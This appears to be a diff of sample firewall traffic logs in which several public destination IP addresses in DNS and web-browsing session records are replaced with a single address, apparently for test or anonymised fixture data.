04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 
09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 
04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:50,24961,1,52531,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25194,1,56463,53,0,0,0x200000,udp,allow,214,77,137,2,2012/04/10 
04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26257,1,55849,53,0,0,0x200000,udp,allow,170,77,93,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 
04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:49,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24844,1,56995,53,0,0,0x200000,udp,allow,176,176,0,2,2012/04/10 04:39:18,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 
04:39:48,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:42 1,2012/10/30 
09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
